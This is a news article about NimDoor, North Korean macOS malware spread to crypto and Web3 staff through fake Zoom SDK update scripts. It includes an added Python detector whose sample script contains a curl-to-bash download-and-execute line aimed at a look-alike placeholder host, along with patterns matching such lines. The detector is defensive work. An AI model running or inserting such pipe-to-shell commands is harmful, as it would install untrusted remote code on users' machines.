
Novel North Korean macOS malware found targeting Web3, crypto platforms


A new threat campaign run by North Korean hackers is targeting macOS devices with malware called NimDoor. The campaign targets Web3 and crypto-related businesses and was first discovered active in April 2025.

Hackers use social engineering tactics and Telegram to reach out to potential targets, likely in the Web3 and crypto fields, and invite them to a meeting via Calendly. The target is then sent an email with a Zoom meeting link and instructions to run a fake Zoom update that starts the infection process. If run successfully, the malware can steal Telegram user data, browser data, and Apple Keychain credentials.


This update script, dubbed a Zoom SDK update, ends with three lines of malicious code that download and execute a second-stage script from a command-and-control (C2) server hosted at a domain name very similar to the legitimate Zoom meeting domain. SentinelLabs’ investigation into the malware revealed several parallel domains in use by the hackers as well.

The second-stage script then downloads an HTML file containing a legitimate Zoom redirect link. The file is fetched with curl and executed via a run script to start the attack proper. The attackers then install multiple binaries on the target system, each with its own function: stealing browser data, keychain data, and Telegram user data, and maintaining persistence. Most popular macOS browsers are affected by the malware, including Arc, Brave, Firefox, Chrome, and Edge.
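As an added, defender-side illustration (not from the article or from SentinelLabs’ report), the Python below scans a macOS shell script for the tail pattern described above: a curl/wget line that pipes straight into a shell, or whose host mentions Zoom without being under the official zoom.us domain. The sample script, the look-alike hostname and the allowlist are constructed for this example.

```python
import re
from urllib.parse import urlparse

# Constructed sample of a fake "Zoom SDK update" script: harmless lines
# followed by a download-and-execute tail from a look-alike domain.
SAMPLE_SCRIPT = """#!/bin/bash
echo "Updating Zoom SDK..."
sleep 2
curl -s https://zoom.us/client/latest/ -o /dev/null
curl -fsSL https://zoom-sdk-update.example/bootstrap.sh | bash
"""

# Allowlist of official Zoom hosts (constructed; extend for your environment).
OFFICIAL_ZOOM_HOSTS = ("zoom.us",)

URL_RE = re.compile(r"https?://[^\s'\"|;&)]+")
DOWNLOAD_CMD_RE = re.compile(r"\b(curl|wget)\b")
# Download output fed to a shell: "| bash", "| sh", "$(curl ...)", "eval".
EXEC_SINK_RE = re.compile(r"\|\s*(ba|z)?sh\b|\$\(\s*(curl|wget)\b|\beval\b")


def host_is_official(host):
    """True if host is the official domain or one of its subdomains."""
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in OFFICIAL_ZOOM_HOSTS)


def looks_like_zoom(host):
    """A host that mentions 'zoom' but is not under zoom.us is a look-alike candidate."""
    return "zoom" in host.lower() and not host_is_official(host)


def find_suspicious_lines(script_text):
    """Return one finding per download line that executes its payload or uses a look-alike host."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        if not DOWNLOAD_CMD_RE.search(line):
            continue
        hosts = [urlparse(u).hostname or "" for u in URL_RE.findall(line)]
        download_and_exec = bool(EXEC_SINK_RE.search(line))
        lookalikes = [h for h in hosts if looks_like_zoom(h)]
        if download_and_exec or lookalikes:
            findings.append({"line": lineno, "hosts": hosts,
                             "download_and_exec": download_and_exec,
                             "lookalike_hosts": lookalikes})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_lines(SAMPLE_SCRIPT):
        print(f"line {f['line']}: exec={f['download_and_exec']} hosts={f['hosts']}")
```

The fetch from zoom.us on line 4 is not reported; only the piped-to-bash fetch from the look-alike host is.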

No fixes for the campaign have surfaced yet. People in the Web3 and crypto spaces are advised to treat unsolicited invitations from contacts on social media or messaging apps such as WhatsApp, and especially Telegram, with caution. Software updates should also only ever be downloaded from official sources.


Yadullah Abidi

Yadullah is a Computer Science graduate who writes/edits/shoots/codes all things cybersecurity, gaming, and tech hardware. When he's not, he streams himself racing virtual cars. He's been writing and reporting on tech and cybersecurity with websites like Candid.Technology and MakeUseOf since 2018. You can contact him here: yadullahabidi@pm.me.
